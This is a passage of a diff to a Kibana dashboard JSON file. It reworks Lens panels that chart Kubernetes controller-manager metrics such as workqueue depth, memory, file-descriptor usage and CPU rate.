"orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "7e0ad24d-199f-4ede-8b71-90152913fa90", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "2b80230c-9cc8-444f-b092-1fbc4d764992": { - "columnOrder": [ - "e7259e4c-0700-48a5-aeff-993fc075bcab", - "7b8d9b03-439b-4171-8b64-91b8664b4b94", - "725088f8-ac91-4df6-8863-f9abe7ad40cd", - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0", - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" - ], - "columns": { - "725088f8-ac91-4df6-8863-f9abe7ad40cd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Depth", - "operationType": "formula", - "params": { - "formula": "differences(average(kubernetes.controllermanager.workqueue.depth.count, kql='kubernetes.controllermanager.workqueue.depth.count: *'))", - "isFormulaBroken": false - }, - "references": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.workqueue.depth.count: *" - }, - "isBucketed": false, - "label": "Part of Depth", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.depth.count" - }, - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Depth", - "operationType": "differences", - "references": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" - ], - "scale": "ratio" - }, - "7b8d9b03-439b-4171-8b64-91b8664b4b94": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e7259e4c-0700-48a5-aeff-993fc075bcab": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Depth", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of kubernetes.controllermanager.workqueue.depth.count", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.depth.count" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "7e0ad24d-199f-4ede-8b71-90152913fa90", - "key": "kubernetes.controllermanager.workqueue.depth.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.workqueue.depth.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.name" + }, + "910bd079-4852-48bd-9d7a-e5eb940f0838": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Resident memory", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "layers": [ - { - "accessors": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cd" - ], - "collapseFn": "", - "layerId": "2b80230c-9cc8-444f-b092-1fbc4d764992", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "e7259e4c-0700-48a5-aeff-993fc075bcab", - "xAccessor": "7b8d9b03-439b-4171-8b64-91b8664b4b94" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yLeftExtent": { - "mode": "full" + "formula": "last_value(kubernetes.controllermanager.process.memory.resident.bytes)", + "isFormulaBroken": false + }, + "references": [ + "910bd079-4852-48bd-9d7a-e5eb940f0838X0" + ], + "scale": "ratio" + }, + "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.process.memory.resident.bytes: *" + }, + "isBucketed": false, + "label": "Part of Resident memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.memory.resident.bytes" + }, + "96c80749-da61-425a-b637-878d33e410fd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Open file descriptors usage", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 1 + } + }, + "formula": "last_value(kubernetes.controllermanager.process.fds.open.count)/last_value(kubernetes.controllermanager.process.fds.max.count)*100", + "isFormulaBroken": false + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX2" + ], + "scale": "ratio" + }, + "96c80749-da61-425a-b637-878d33e410fdX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.process.fds.open.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.fds.open.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.process.fds.max.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.fds.max.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "name": "divide", + "type": "function" }, - "yTitle": "" + 100 + ], + "location": { + "max": 130, + "min": 0 + }, + "name": "multiply", + "text": "last_value(kubernetes.controllermanager.process.fds.open.count)/last_value(kubernetes.controllermanager.process.fds.max.count)*100", + "type": "function" } + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "3a26dffa-0696-485d-b991-1dbc5092082e", - "w": 24, - "x": 0, - "y": 27 - }, - "panelIndex": "3a26dffa-0696-485d-b991-1dbc5092082e", - "title": "Workqueue depth rate", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "type": "index-pattern" + "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Virtual memory", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", - "type": "index-pattern" - } + "formula": "last_value(kubernetes.controllermanager.process.memory.virtual.bytes)", + "isFormulaBroken": false + }, + "references": [ + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" + ], + "scale": "ratio" + }, + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.process.memory.virtual.bytes: *" + }, + "isBucketed": false, + "label": "Part of Virtual memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.memory.virtual.bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "daf730fb-a3b5-400a-acba-cff0c8ba607d", + "key": "kubernetes.controllermanager.process.fds.open.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.process.fds.open.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" + }, + { + "alignment": "center", + "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" + }, + { + "alignment": "center", + "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "isTransposed": false + }, + { + "alignment": "center", + "colorMode": "text", + "columnId": "96c80749-da61-425a-b637-878d33e410fd", + "isTransposed": false, + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#54B399", + "stop": 0 + }, + { + "color": "#e6ca49", + "stop": 60 + }, + { + "color": "#E7664C", + "stop": 90 + } ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "a2facaed-7c02-4fb6-9126-5512b8ffd26f": { - "columnOrder": [ - "73933c6b-b6da-45c6-a190-c501453f658f", - "3ed7787d-1fbe-487f-a377-9a5e5e6f2571", - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" - ], - "columns": { - "3ed7787d-1fbe-487f-a377-9a5e5e6f2571": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "73933c6b-b6da-45c6-a190-c501453f658f": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.controllermanager.name + 1 other", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.controllermanager.workqueue.unfinished.sec", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.unfinished.sec" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.name" - }, - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778": { - "dataType": "number", - "isBucketed": false, - "label": "Last value of kubernetes.controllermanager.workqueue.unfinished.sec", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "s" - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.unfinished.sec" - } - }, - "incompleteColumns": {} - } - } - } + "continuity": "above", + "name": "custom", + "rangeMax": null, + "rangeMin": 0, + "rangeType": "number", + "steps": 5, + "stops": [ + { + "color": "#54B399", + "stop": 60 + }, + { + "color": "#e6ca49", + "stop": 90 + }, + { + "color": "#E7664C", + "stop": 91 + } + ] + }, + "type": "palette" + } + } + ], + "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Controller manager process data" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 18, + "i": "303702e1-ba33-49f2-b337-4cc7d7305606", + "w": 24, + "x": 24, + "y": 44 + }, + "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "236aa40a-181f-4c61-af17-8df4ecba80d3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { + "columnOrder": [ + "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "d523e6d2-50f3-4b45-8815-8259df43850c", + "cf481e4f-b568-4306-8da9-5e3d516ccbea", + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "columns": { + "7e1756d9-af1b-4204-a8d4-8c57987216f0": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", - "key": "kubernetes.controllermanager.workqueue.unfinished.sec", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.workqueue.unfinished.sec" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" - ], - "layerId": "a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "73933c6b-b6da-45c6-a190-c501453f658f", - "xAccessor": "3ed7787d-1fbe-487f-a377-9a5e5e6f2571" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", - "w": 24, - "x": 24, - "y": 27 - }, - "panelIndex": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", - "title": "Current unfinished work", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "cf481e4f-b568-4306-8da9-5e3d516ccbea": { + "dataType": "number", + "isBucketed": false, + "label": "average(kubernetes.controllermanager.process.memory.resident.bytes)", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + }, + "formula": "average(kubernetes.controllermanager.process.memory.resident.bytes)", + "isFormulaBroken": false + }, + "references": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "scale": "ratio" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(239,249,218,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Process", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of average(kubernetes.controllermanager.process.memory.resident.bytes)", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.memory.resident.bytes" }, - "title": "", - "type": "metrics", - "uiState": {} + "d523e6d2-50f3-4b45-8815-8259df43850c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "236aa40a-181f-4c61-af17-8df4ecba80d3", + "key": "kubernetes.controllermanager.process.cpu.sec", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.process.cpu.sec" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "w": 48, - "x": 0, - "y": 41 + "fillOpacity": 0.3, + "layers": [ + { + "accessors": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbea" + ], + "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", + "yConfig": [] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average resident memory" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "1604f0de-edd6-456e-8670-ab9b33988abb", + "w": 24, + "x": 0, + "y": 50 + }, + "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a781e55e-e2bc-4b36-b197-1b55842aeff7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { + "columnOrder": [ + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "301759e0-f73e-4e6d-a7c5-d0938024e989", + "301759e0-f73e-4e6d-a7c5-d0938024e989X1", + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "columns": { + "236eb2de-d45f-43f2-83f4-5a1d7355132b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Increases in Controller CPU", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "s" + } }, - { - "id": "metrics-*", - "name": "daf730fb-a3b5-400a-acba-cff0c8ba607d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { - "columnOrder": [ - "6cbab896-ee42-4dad-8831-12f53cda0d6d", - "910bd079-4852-48bd-9d7a-e5eb940f0838", - "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "96c80749-da61-425a-b637-878d33e410fd", - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX2", - "96c80749-da61-425a-b637-878d33e410fdX1", - "910bd079-4852-48bd-9d7a-e5eb940f0838X0", - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" - ], - "columns": { - "6cbab896-ee42-4dad-8831-12f53cda0d6d": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Resident memory", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(kubernetes.controllermanager.process.memory.resident.bytes)", - "isFormulaBroken": false - }, - "references": [ - "910bd079-4852-48bd-9d7a-e5eb940f0838X0" - ], - "scale": "ratio" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.process.memory.resident.bytes: *" - }, - "isBucketed": false, - "label": "Part of Resident memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.memory.resident.bytes" - }, - "96c80749-da61-425a-b637-878d33e410fd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Open file descriptors usage", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - }, - "formula": "last_value(kubernetes.controllermanager.process.fds.open.count)/last_value(kubernetes.controllermanager.process.fds.max.count)*100", - "isFormulaBroken": false - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX2" - ], - "scale": "ratio" - }, - "96c80749-da61-425a-b637-878d33e410fdX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.process.fds.open.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.fds.open.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.process.fds.max.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.fds.max.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "name": "divide", - "type": "function" - }, - 100 - ], - "location": { - "max": 130, - "min": 0 - }, - "name": "multiply", - "text": "last_value(kubernetes.controllermanager.process.fds.open.count)/last_value(kubernetes.controllermanager.process.fds.max.count)*100", - "type": "function" - } - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "scale": "ratio" - }, - "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Virtual memory", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(kubernetes.controllermanager.process.memory.virtual.bytes)", - "isFormulaBroken": false - }, - "references": [ - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" - ], - "scale": "ratio" - }, - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.process.memory.virtual.bytes: *" - }, - "isBucketed": false, - "label": "Part of Virtual memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.process.memory.virtual.bytes" - } - }, - "incompleteColumns": {} - } - } - } + "formula": "counter_rate(last_value(kubernetes.controllermanager.process.cpu.sec))", + "isFormulaBroken": false + }, + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X1" + ], + "scale": "ratio" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.process.cpu.sec: *" + }, + "isBucketed": false, + "label": "Part of Increases in Controller CPU", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.cpu.sec" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Increases in Controller CPU", + "operationType": "counter_rate", + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { + "dataType": "string", + "isBucketed": true, + "label": "Top 20 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": false, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "daf730fb-a3b5-400a-acba-cff0c8ba607d", - "key": "kubernetes.controllermanager.process.fds.open.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.process.fds.open.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" - }, - { - "alignment": "center", - "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" - }, - { - "alignment": "center", - "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "isTransposed": false - }, - { - "alignment": "center", - "colorMode": "text", - "columnId": "96c80749-da61-425a-b637-878d33e410fd", - "isTransposed": false, - "palette": { - "name": "custom", - "params": { - "colorStops": [ - { - "color": "#54B399", - "stop": 0 - }, - { - "color": "#e6ca49", - "stop": 60 - }, - { - "color": "#E7664C", - "stop": 90 - } - ], - "continuity": "above", - "name": "custom", - "rangeMax": null, - "rangeMin": 0, - "rangeType": "number", - "steps": 5, - "stops": [ - { - "color": "#54B399", - "stop": 60 - }, - { - "color": "#e6ca49", - "stop": 90 - }, - { - "color": "#E7664C", - "stop": 91 - } - ] - }, - "type": "palette" - } - } - ], - "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" + "size": 20 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "a781e55e-e2bc-4b36-b197-1b55842aeff7", + "key": "kubernetes.controllermanager.process.cpu.sec", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.process.cpu.sec" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + 